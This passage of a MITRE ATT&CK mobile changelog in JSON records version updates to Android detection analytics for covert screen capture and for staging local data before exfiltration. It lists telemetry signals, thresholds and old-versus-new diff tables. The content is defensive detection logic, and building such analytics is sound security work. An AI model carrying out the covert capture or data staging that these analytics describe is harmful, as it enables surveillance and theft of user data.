class=\"diff_add\">ication&nbsp;background&nbsp;execution&nbsp;behavior,&nbsp;where&nbsp;direct&nbsp;observat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on&nbsp;is&nbsp;regarded&nbsp;as&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;of&nbsp;keypair&nbsp;operations&nbsp;is&nbsp;limited.&nbsp;Detection&nbsp;correlates&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp&nbsp;entitlement&nbsp;posture&nbsp;+&nbsp;background&nbsp;execution&nbsp;+&nbsp;asymmetric&nbsp;h</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">andshake&nbsp;patterns&nbsp;+&nbsp;subsequent&nbsp;encrypted&nbsp;communication.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--427fe5c7-1b91-4d71-ae2c-6840d128f0bd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-24 17:47:35.979000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0668#AN1764",
                            "external_id": "AN1764"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1764",
                    "description": "The defender correlates Android screen-capture-capable behavior from an app identity with runtime context showing that foreground content from another app is being captured outside expected user-driven workflows. The strongest Android evidence is MediaProjection-like capture initiation, accessibility-assisted observation of foreground UI content, or privileged screencap or screenrecord behavior, followed by screenshot or video artifact creation, buffer growth, or outbound transfer. The detection is strengthened when the capturing app is backgrounded, operates as a foreground service without clear user-driven recording intent, captures while another sensitive app is foregrounded, runs with accessibility or elevated access inconsistent with its role, or performs capture without recent user interaction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Capturing app remained backgrounded or foreground-service-only while screen capture session occurred and another app was foregrounded during capture interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before screen capture session start and no expected foreground transition or consent-linked interaction occurred during capture interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Sensitive app category remained foregrounded during screen capture session from different app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking capture-path invocation, foreground-app context, artifact creation, and optional upload."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved screen-recording, accessibility, remote-support, or QA/testing apps vary by organization and device group."
                        },
                        {
                            "field": "AllowedAccessibilityApps",
                            "description": "Approved accessibility-enabled apps vary by assistive and enterprise workflow."
                        },
                        {
                            "field": "AllowedForegroundServiceCaptureApps",
                            "description": "Some approved apps may legitimately use foreground services during screen recording."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close capture initiation must be to user interaction to be considered expected."
                        },
                        {
                            "field": "SensitiveForegroundAppCategories",
                            "description": "Categories such as banking, identity, messaging, or enterprise apps may warrant higher sensitivity during capture."
                        },
                        {
                            "field": "ArtifactWriteThreshold",
                            "description": "Minimum screenshot/video/cache write volume indicating probable screen-capture output."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious outbound transfer after capture."
                        },
                        {
                            "field": "ConsentInteractionGracePeriod",
                            "description": "Grace period allowed for expected user consent or explicit initiation before capture is treated as suspicious."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window linking capture-path invocation, foreground-app context, artifact creation, and optional upload.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved screen-recording, accessibility, remote-support, or QA/testing apps vary by organization and device group.\"}, {\"field\": \"AllowedAccessibilityApps\", \"description\": \"Approved accessibility-enabled apps vary by assistive and enterprise workflow.\"}, {\"field\": \"AllowedForegroundServiceCaptureApps\", \"description\": \"Some approved apps may legitimately use foreground services during screen recording.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close capture initiation must be to user interaction to be considered expected.\"}, {\"field\": \"SensitiveForegroundAppCategories\", \"description\": \"Categories such as banking, identity, messaging, or enterprise apps may warrant higher sensitivity during capture.\"}, {\"field\": \"ArtifactWriteThreshold\", \"description\": \"Minimum screenshot/video/cache write volume indicating probable screen-capture output.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious outbound transfer after capture.\"}, {\"field\": \"ConsentInteractionGracePeriod\", \"description\": \"Grace period allowed for expected user consent or explicit initiation before capture is treated as suspicious.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-24 17:47:35.979000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates Android screen-capture-capable behavior from an app identity with runtime context showing that foreground content from another app is being captured outside expected user-driven workflows. The strongest Android evidence is MediaProjection-like capture initiation, accessibility-assisted observation of foreground UI content, or privileged screencap or screenrecord behavior, followed by screenshot or video artifact creation, buffer growth, or outbound transfer. The detection is strengthened when the capturing app is backgrounded, operates as a foreground service without clear user-driven recording intent, captures while another sensitive app is foregrounded, runs with accessibility or elevated access inconsistent with its role, or performs capture without recent user interaction.\", \"old_value\": \"Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.\\nThe user can view a list of apps with accessibility service privileges in the device settings.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.\\n-The user can view a list of apps with accessibility service privileges in the device settings.\\n+The defender correlates Android screen-capture-capable behavior from an app identity with runtime context showing that foreground content from another app is being captured outside expected user-driven workflows. The strongest Android evidence is MediaProjection-like capture initiation, accessibility-assisted observation of foreground UI content, or privileged screencap or screenrecord behavior, followed by screenshot or video artifact creation, buffer growth, or outbound transfer. The detection is strengthened when the capturing app is backgrounded, operates as a foreground service without clear user-driven recording intent, captures while another sensitive app is foregrounded, runs with accessibility or elevated access inconsistent with its role, or performs capture without recent user interaction.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Capturing app remained backgrounded or foreground-service-only while screen capture session occurred and another app was foregrounded during capture interval\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before screen capture session start and no expected foreground transition or consent-linked interaction occurred during capture interval\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Sensitive app category remained foregrounded during screen capture session from different app identity\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to137__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to137__0\"><a href=\"#difflib_chg_to137__top\">t</a></td><td class=\"diff_header\" id=\"from137_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;the&nbsp;use&nbsp;of&nbsp;the&nbsp;And</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to137__top\">t</a></td><td class=\"diff_header\" id=\"to137_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;Android&nbsp;screen-capture-capable&nbsp;behav</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">roid&nbsp;`MediaProjectionManager`&nbsp;class,&nbsp;applying&nbsp;extra&nbsp;scrutiny</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ior&nbsp;from&nbsp;an&nbsp;app&nbsp;identity&nbsp;with&nbsp;runtime&nbsp;context&nbsp;showing&nbsp;that&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;to&nbsp;applications&nbsp;that&nbsp;use&nbsp;the&nbsp;class.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;a&nbsp;lis</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oreground&nbsp;content&nbsp;from&nbsp;another&nbsp;app&nbsp;is&nbsp;being&nbsp;captured&nbsp;outside</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;of&nbsp;apps&nbsp;with&nbsp;accessibility&nbsp;service&nbsp;privileges&nbsp;in&nbsp;the&nbsp;devic</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;expected&nbsp;user-driven&nbsp;workflows.&nbsp;The&nbsp;strongest&nbsp;Android&nbsp;evide</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;settings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nce&nbsp;is&nbsp;MediaProjection-like&nbsp;capture&nbsp;initiation,&nbsp;accessibilit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y-assisted&nbsp;observation&nbsp;of&nbsp;foreground&nbsp;UI&nbsp;content,&nbsp;or&nbsp;privileg</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;screencap&nbsp;or&nbsp;screenrecord&nbsp;behavior,&nbsp;followed&nbsp;by&nbsp;screensho</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;or&nbsp;video&nbsp;artifact&nbsp;creation,&nbsp;buffer&nbsp;growth,&nbsp;or&nbsp;outbound&nbsp;tra</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nsfer.&nbsp;The&nbsp;detection&nbsp;is&nbsp;strengthened&nbsp;when&nbsp;the&nbsp;capturing&nbsp;app&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">is&nbsp;backgrounded,&nbsp;operates&nbsp;as&nbsp;a&nbsp;foreground&nbsp;service&nbsp;without&nbsp;cl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ear&nbsp;user-driven&nbsp;recording&nbsp;intent,&nbsp;captures&nbsp;while&nbsp;another&nbsp;sen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sitive&nbsp;app&nbsp;is&nbsp;foregrounded,&nbsp;runs&nbsp;with&nbsp;accessibility&nbsp;or&nbsp;eleva</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ted&nbsp;access&nbsp;inconsistent&nbsp;with&nbsp;its&nbsp;role,&nbsp;or&nbsp;performs&nbsp;capture&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ithout&nbsp;recent&nbsp;user&nbsp;interaction.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--bfa12b75-13ab-409f-8fe9-a93c8bcac466",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 16:39:38.897000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0670#AN1767",
                            "external_id": "AN1767"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1767",
                    "description": "The defender correlates recent access to locally collected or protected data with subsequent compression, packaging, or encryption behavior inside the same app context, followed by creation of archive-like or high-entropy output and optional near-term network transmission. The analytic prioritizes Android runtime and storage effects: application data access or sensor-derived collection, compression/encryption framework use, archive/blob creation in app-accessible storage, and background or device-locked execution inconsistent with the app\u2019s declared function.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between data access, package creation, encryption, and optional network upload"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to package local data such as backup, cloud sync, file manager, or media editing apps"
                        },
                        {
                            "field": "AllowedPathList",
                            "description": "Expected storage paths for legitimate archives, exports, or caches"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether packaging/export behavior should occur only during active user-driven workflows"
                        },
                        {
                            "field": "BurstReadThreshold",
                            "description": "Number of files or records read in a short interval before archive creation"
                        },
                        {
                            "field": "ArchiveSizeThreshold",
                            "description": "Minimum output size for suspicious packaged blob or archive"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for identifying encrypted or heavily compressed output"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum upload size consistent with recent archive creation"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between data access, package creation, encryption, and optional network upload\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to package local data such as backup, cloud sync, file manager, or media editing apps\"}, {\"field\": \"AllowedPathList\", \"description\": \"Expected storage paths for legitimate archives, exports, or caches\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether packaging/export behavior should occur only during active user-driven workflows\"}, {\"field\": \"BurstReadThreshold\", \"description\": \"Number of files or records read in a short interval before archive creation\"}, {\"field\": \"ArchiveSizeThreshold\", \"description\": \"Minimum output size for suspicious packaged blob or archive\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for identifying encrypted or heavily compressed output\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum upload size consistent with recent archive creation\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 16:39:38.897000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates recent access to locally collected or protected data with subsequent compression, packaging, or encryption behavior inside the same app context, followed by creation of archive-like or high-entropy output and optional near-term network transmission. The analytic prioritizes Android runtime and storage effects: application data access or sensor-derived collection, compression/encryption framework use, archive/blob creation in app-accessible storage, and background or device-locked execution inconsistent with the app\\u2019s declared function.\", \"old_value\": \"Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to166__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to166__0\"><a href=\"#difflib_chg_to166__top\">t</a></td><td class=\"diff_header\" id=\"from166_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;encryption&nbsp;mechanisms&nbsp;are&nbsp;built&nbsp;into&nbsp;standard&nbsp;applicati</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to166__top\">t</a></td><td class=\"diff_header\" id=\"to166_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;recent&nbsp;access&nbsp;to&nbsp;locally&nbsp;collected&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on-accessible&nbsp;APIs&nbsp;and&nbsp;are&nbsp;therefore&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;end</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;protected&nbsp;data&nbsp;with&nbsp;subsequent&nbsp;compression,&nbsp;packaging,&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">encryption&nbsp;behavior&nbsp;inside&nbsp;the&nbsp;same&nbsp;app&nbsp;context,&nbsp;followed&nbsp;by</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;creation&nbsp;of&nbsp;archive-like&nbsp;or&nbsp;high-entropy&nbsp;output&nbsp;and&nbsp;optiona</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">l&nbsp;near-term&nbsp;network&nbsp;transmission.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;A</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ndroid&nbsp;runtime&nbsp;and&nbsp;storage&nbsp;effects:&nbsp;application&nbsp;data&nbsp;access&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;sensor-derived&nbsp;collection,&nbsp;compression/encryption&nbsp;framewo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rk&nbsp;use,&nbsp;archive/blob&nbsp;creation&nbsp;in&nbsp;app-accessible&nbsp;storage,&nbsp;and</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;background&nbsp;or&nbsp;device-locked&nbsp;execution&nbsp;inconsistent&nbsp;with&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;app\u2019s&nbsp;declared&nbsp;function.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1e72355d-3350-4b60-8c92-2ded50a3fdd1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 18:29:03.808000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0670#AN1768",
                            "external_id": "AN1768"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
